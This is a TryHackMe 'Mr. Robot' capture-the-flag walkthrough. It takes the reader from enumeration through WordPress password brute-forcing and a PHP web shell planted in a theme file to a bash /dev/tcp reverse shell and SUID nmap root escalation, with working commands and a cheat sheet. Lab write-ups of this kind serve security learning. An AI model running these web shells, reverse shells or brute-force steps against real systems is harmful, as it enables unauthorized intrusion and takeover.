TryHackMe — Mr. Robot — Detailed Walkthrough

Room: Mr. Robot Author: Karan Tank Type: Beginner → Intermediate (Web → PrivEsc)

Summary

Mr. Robot is a classic TryHackMe machine that mimics the storyline from the TV series. It combines web enumeration (WordPress), credential discovery, and privilege escalation via common misconfigurations. The objective is to capture three flags:

Note: This writeup intentionally includes realistic commands and output examples. Use these techniques only on authorized targets (CTFs, labs you own, or explicit permission).

1 — Recon & Scanning

Initial port scan

Start with a full TCP scan to discover services:

nmap -sC -sV -p- --min-rate=1000 -oN nmap_full.txt <TARGET_IP>

Typical results (example):


PORT   STATE SERVICE  VERSION
22/tcp open  ssh      OpenSSH 7.6p1
80/tcp open  http     Apache httpd 2.4.29
443/tcp open  https   Apache httpd 2.4.29 (SSL)

In Mr. Robot, the important service is the web server (HTTP).

Quick web check

Open the site in a browser. The landing page is a blog/WordPress themed site with a design referencing to show a prime candidate for web enumeration and configuration leaks.

2 — Web Enumeration

Directory brute-force

Use a directory bruteforcer like gobuster or dirb to find hidden files and paths:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,log -o gobuster.txt

Check /robots.txt and other public files:

curl -s http://<TARGET_IP>/robots.txt | sed -n '1,120p'

Example found entries (this is critical):


User-agent: *
Disallow: /fsocity.dic
Disallow: /key-1-of-3.txt

Finding fsocity.dic is a big clue — it's a large wordlist commonly used in this box for password brute-forcing.

Retrieve the file & the first flag

curl -s http://<TARGET_IP>/fsocity.dic -o fsocity.dic
curl -s http://<TARGET_IP>/key-1-of-3.txt -o key-1-of-3.txt
cat key-1-of-3.txt

After this step you should have key-1-of-3.txt.

WordPress login

WordPress endpoints may be present:

http://<TARGET_IP>/wp-login.php

Use the discovered dictionary to brute-force a WordPress login for common users.

WPScan (optional)

WPScan can enumerate themes, plugins and attempt wordlist logins:

wpscan --url http://<TARGET_IP> --enumerate u,vp,tt --threads 10

To brute-force a username (e.g., Elliot) with the discovered dictionary:

wpscan --url http://<TARGET_IP> -U Elliot -P fsocity.dic --disable-tls-checks

Sometimes it is faster to try common usernames first (e.g., admin, elliot, robot). The show/room often uses Elliot.

3 — Getting a Shell

Successful WP login

Once credentials are found, login to the WordPress admin dashboard. From there, the Appearance → Theme Editor (or plugin editors) can allow direct file edits (if enabled).

Upload or inject a web shell

Two common approaches:

  1. Edit a theme PHP file (e.g., 404.php) and place a small PHP command execution snippet:
<?php if(isset($_REQUEST['cmd'])){echo "<pre>"; system($_REQUEST['cmd']); echo "</pre>"; exit; } ?>

Trigger it:

curl "http://<TARGET_IP>/404.php?cmd=id"

If the host allows reverse connections, use a reverse shell payload. Example using netcat (on your machine):

# On attackbox
nc -lvnp 9001

# Trigger from victim (via web shell)
/bin/bash -i >& /dev/tcp/<your_ip>/9001 0>&1

If direct reverse shells are blocked, use `curl`/`wget` to fetch a more capable payload or use socks/proxy pivoting.

Upgrade the shell

Always upgrade to a proper interactive shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo; fg
reset
export SHELL=bash; export TERM=xterm-256color

4 — Privilege Escalation

Initial checks

uname -a
id
ls -la /home

Look for interesting files in user directories:

ls -la /home/robot
cat /home/robot/.bash_history
ls -la /home/robot

Common MR. ROBOT clues

On this box you often find a file like password.raw-md5 or other password hints. Example:

cat /home/robot/password.raw-md5
5f4dcc3b5aa765d61d8327deb882cf99

Use offline cracking or online services (CrackStation) to convert MD5 hashes where allowed. Locally you can use hashcat or john:

john --wordlist=/usr/share/wordlists/rockyou.txt hashfile.txt

Switch user to robot

Once you recover the password, switch user:

su - robot
# or
ssh robot@localhost

Grab the second flag (usually in /home/robot):

cat /home/robot/key-2-of-3.txt

Finding SUID/interesting binaries

Search for SUID files and system binaries that can be abused:

find / -perm -4000 -type f 2>/dev/null | sort

Look also for local binaries of common tools that may allow escape (older `nmap`, `vi`, `less`, `awk`, `perl`, etc.).

Escalating to root

One canonical Mr. Robot path is abusing an interactive mode in an older nmap binary. Example (if /usr/local/bin/nmap is SUID):

nmap --interactive
# then at the nmap prompt:
!sh
# now you're a shell as root
id
cat /root/key-3-of-3.txt

If nmap --interactive doesn't work, check the binary version and GTFOBins or search for other SUID programs. Privilege escalation is often specific to the environment—enumeration is the key.

5 — Flags (Collected)

FlagLocationUser
key-1-of-3.txt/key-1-of-3.txt (robots.txt)N/A
key-2-of-3.txt/home/robot/key-2-of-3.txtrobot
key-3-of-3.txt/root/key-3-of-3.txtroot

Example commands to view flags (from the appropriate user):

cat /key-1-of-3.txt
cat /home/robot/key-2-of-3.txt
cat /root/key-3-of-3.txt

6 — Lessons & Takeaways

  • Thorough enumeration (directories, robots.txt, files) often yields the quickest wins.
  • Passwords may be present in unusual formats (large dictionaries, raw MD5 hashes). Save and reuse discovered artifacts.
  • Web admin interfaces (WordPress editors, uploaders) are powerful entry points when misconfigured.
  • Privilege escalation commonly leverages SUID misconfigurations and outdated binaries; always check GTFOBins.
  • Document your steps — screenshots, commands, and justification are crucial for reports and learning.

Resources & Tools used

  • nmap, gobuster/dirb, curl/wget
  • wpscan (WordPress enumeration)
  • john/hashcat for password cracking
  • GTFOBins for SUID/binary abuse ideas

Appendix — Useful commands (cheat sheet)


# Scan
nmap -sC -sV -p- <IP>

# Dir brute
gobuster dir -u http://<IP> -w /usr/share/wordlists/dirb/common.txt

# Retrieve files
curl -s http://<IP>/fsocity.dic -o fsocity.dic

# WPScan
wpscan --url http://<IP> --enumerate u --threads 20

# Reverse shell (listener)
nc -lvnp 9001

# Upgrade shell
python3 -c 'import pty; pty.spawn("/bin/bash")'